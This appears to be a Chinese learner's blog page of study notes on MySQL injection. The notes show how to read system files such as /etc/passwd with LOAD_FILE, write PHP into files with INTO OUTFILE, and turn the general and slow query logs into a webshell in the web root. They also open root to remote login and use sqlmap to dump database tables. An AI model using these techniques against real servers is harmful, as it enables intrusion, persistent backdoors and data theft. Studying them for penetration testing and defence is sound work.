
<!DOCTYPE html>
<html lang="zh ">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>菜菜 || 开发小白</title>
    <meta name="author" content="kevin7gif">
    <meta name="description" content="Kevin's blog ">
    <meta name="keywords" content=" ">
    <link rel="icon" href="//img/16584.png">
    <link rel="stylesheet" href="/css/antd.min.css">
    
    <link rel="stylesheet" href="/css/maiden-theme.css">
    
    <script src="/js/vue.js"></script>
    <script src="/js/antd.min.js"></script>
<meta name="generator" content="Hexo 6.3.0"></head>

<body>

    <div id="loading"
        style="height: 100vh; width: 100%; position: fixed;display: flex;z-index: 200; justify-content: space-between;">
        <div id="loadleft" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div id="loadright" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div
            style="position: fixed; height: 100vh; width: 100%;display: flex;justify-content: center;align-items: center;">
            <div id="loadcontent"
                style="width:400px;height:400px;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px#a3ddfb; text-align:center;opacity:1;transition:opacity 0.3s ease-out;">
                <div>
                    <h2>LOADING...</h2>
                    <p>加载过慢请开启缓存(浏览器默认开启)</p>
                    <div>
                        <img src="/dancingkitty.gif" alt="loading">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="layout">
        <transition name="into">
            <div v-show="show_page" style="display: none;">
                <div id="menu_show">
                     
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">菜菜</span>
        </a>
        
        <a href="/">
            <span>
                <a-icon type="home" theme="filled" />
            </span>
            <span>home</span>
        </a>
        
        <a href="/about">
            <span>
                <a-icon type="idcard" theme="filled" />
            </span>
            <span>about</span>
        </a>
        
        <a href="/archives">
            <span>
                <a-icon type="folder" theme="filled" />
            </span>
            <span>archives</span>
        </a>
        
        <a href="/categories">
            <span>
                <a-icon type="book" theme="filled" />
            </span>
            <span>categories</span>
        </a>
        
        <a href="/tags">
            <span>
                <a-icon type="tags" theme="filled" />
            </span>
            <span>tags</span>
        </a>
        
    </div>

    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div :class="'title'" @click="menu_show=!menu_show">
            <span style="margin-right: 10px;">
                <a-icon type="appstore" theme="filled" />
            </span>
            <span>菜菜</span>
        </div>
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="home" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">home</div>
                </div>
            </a>
            
            <a href="/about">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="idcard" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">about</div>
                </div>
            </a>
            
            <a href="/archives">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="folder" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">archives</div>
                </div>
            </a>
            
            <a href="/categories">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="book" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">categories</div>
                </div>
            </a>
            
            <a href="/tags">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="tags" theme="filled" />
                    </div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;">tags</div>
                </div>
            </a>
            
        </div>
        <div class="curtain" v-show="menu_show"></div>
    </div>

</nav>
                </div>

                <div id="main">
                     
<link rel="stylesheet" href="/css/post-body.css">
<div class="article">
    <div>
        <h1> </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <a-icon type="calendar" theme="filled" />
            </span>
            2023/5/16
        </span>

        

        
    </div>

    <div class="content" v-pre>
        <h1 id="day4-mysql注入读写文件以及权限问题-amp-amp-sqlmap初识"><a href="#day4-mysql注入读写文件以及权限问题-amp-amp-sqlmap初识" class="headerlink" title="day4 mysql注入读写文件以及权限问题&amp;&amp;sqlmap初识"></a>day4 mysql注入读写文件以及权限问题&amp;&amp;sqlmap初识</h1><h3 id="判断用户是否具有file权限"><a href="#判断用户是否具有file权限" class="headerlink" title="判断用户是否具有file权限"></a>判断用户是否具有file权限</h3><pre><code class="React">select file_priv,user,host from mysql.user;
</code></pre>
<h3 id="查看可写入的路径"><a href="#查看可写入的路径" class="headerlink" title="查看可写入的路径"></a>查看可写入的路径</h3><pre><code class="React">secure_file_priv=&#39;&#39;

secure_file_priv可以设置如下这样进行设置：
1. 设置为空，那么对所有路径均可进行导入导出。
2. 设置为一个目录名字，那么只允许在该路径下导入导出。
3. 设置为Null，那么禁止所有导入导出。
Mysql&gt;=5.5.53 默认为NULL，即默认禁止导入导出，并且不能通过sql语句进行修改
Mysql&lt;5.5.53 默认为空，即默认无限制

需要在mysql的配置文件中更改：
[mysqld]
secure_file_priv=&quot;&quot;
</code></pre>
<h3 id="load-file读取文件"><a href="#load-file读取文件" class="headerlink" title="load_file读取文件"></a>load_file读取文件</h3><pre><code class="React">SELECT LOAD_FILE(&#39;/etc/passwd&#39;);
windows系统下文件路径用正斜杠
</code></pre>
<h3 id="select-into-写入文件"><a href="#select-into-写入文件" class="headerlink" title="select into  写入文件"></a>select into  写入文件</h3><pre><code class="React">select &#39;&lt;?php phpinfo(); ?&gt;&#39; into outfile &#39;c:/1.txt&#39;;
</code></pre>
<h3 id="写入日志文件"><a href="#写入日志文件" class="headerlink" title="写入日志文件"></a>写入日志文件</h3><p>查询日志文件位置</p>
<pre><code class="React">show variables like &#39;%general%&#39;;
</code></pre>
<p>开启日志记录，一般情况下都是没有开的</p>
<pre><code class="React">set global general_log = on;
</code></pre>
<p>设置日志记录的位置</p>
<pre><code class="React">set global general_log_file = &#39;G:/2.txt&#39;;
</code></pre>
<p>然后直接输入便可被记录下来</p>
<p>最后记得改回原来的日志路径，并且关闭日志记录</p>
<h3 id="慢查询写shell"><a href="#慢查询写shell" class="headerlink" title="慢查询写shell"></a>慢查询写shell</h3><p>当查询语句执行的时间要超过系统默认的时间时,该语句才会被记入进慢查询日志</p>
<p>由于开启日志监测后文件会很大，网站访问量大的话我们写的shell会出错,还有可能被发现</p>
<pre><code class="React">show variables like &#39;%slow_query_log%&#39;;    查看慢查询信息

set global slow_query_log=1;        启用慢查询日志(默认禁用)

set global slow_query_log_file=&#39;C:\phpStudy\WWW\shell.php&#39;;  修改日志文件路径

select &#39;123123&#39; or sleep(11);        写文件
</code></pre>
<p>Mysql登录用户名密码存储在C:\phpstudy_pro\Extensions\MySQL5.7.26\data\mysql\user.MYD中</p>
<h3 id="mysql远程登录设置"><a href="#mysql远程登录设置" class="headerlink" title="mysql远程登录设置"></a>mysql远程登录设置</h3><pre><code class="React">use mysql;
select host,user from user；
update user set host = ’%’ where user = ’root’; 将host值改为%即可
flush privileges;  刷新权限


</code></pre>
<h3 id="sqlmap使用"><a href="#sqlmap使用" class="headerlink" title="sqlmap使用"></a>sqlmap使用</h3><p>询数据库：sqlmap -u url -dbs</p>
<p>查某数据库中的表 sqlmap -u url -D 数据库名 -tables</p>
<p>查询某数据库中某表的列 sqlmap -u url -D 数据库名 -T 表名 -columns</p>
<p>查询表中的信息 sqlmap -u url -D 数据库名 -T 表名 -C 字段1,字段2,字段3 –dump</p>

    </div>

    
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css">
    <div id="comment">
        <div id="gitalk-container">
        </div>
    </div>
    
</div>
                     
<footer id="footer">
    <div class="footer-wrap">
        <div>
            © 2018 - 2023 菜菜
            <span class="footer-icon">
                <a-icon type="flag" theme="filled" /></span>
            @kevin7gif
        </div>
        <div></div>
        <div>Based on the <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo Engine</a> & <a
                href="https://github.com/korilin/hexo-theme-particle">Particle Theme</a></div>
        
        <div>
            备案号：<a target="_blank" rel="noopener" href="http://beian.miit.gov.cn/">
                粤ICP备xxxxxx号
            </a>
        </div>
        
    </div>

</footer>

<script src="/js/highlight.min.js"></script>
<script src="/js/particle.js"></script>
                </div>
            </div>
        </transition>
    </div>

    <script>
    new Vue({
        el: "#layout",
        data: {
            show_page: false,
            onload_menu: false,
            menu_show: false,
            card_top: 100
        },
        created: function () {
            var that = this
            window.onload = function () {
                that.show_page = true
                document.getElementById("loadcontent").style.opacity = 0
                setTimeout(function () {
                    document.getElementById("loadleft").style.width = 0
                    document.getElementById("loadright").style.width = 0
                }, 300)
                setTimeout(function () {
                    document.getElementById("loading").style = "display:none"
                }, 600)
            }
        },
        mounted: function () {
            var that = this
            window.addEventListener('scroll', function (e) {
                that.menu_show = false
            })
        },
        methods: {
            home_click: function () {
                window.scrollTo({
                    top: window.innerHeight - 80,
                    behavior: "smooth",
                });
            }
        }
    })
</script>

<script src="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.min.js"></script>
<script>
    const gitalk = new Gitalk({
        clientID: '',
        clientSecret: '',
        repo: 'hexo-theme-particle',      // The repository of store comments,
        owner: 'korilin',
        admin: ['korilin'],
        language: 'en',
        id: location.pathname,      // Ensure uniqueness and length less than 50
        distractionFreeMode: true  // Facebook-like distraction free mode
    })
    gitalk.render('gitalk-container')
</script>

</body>

</html>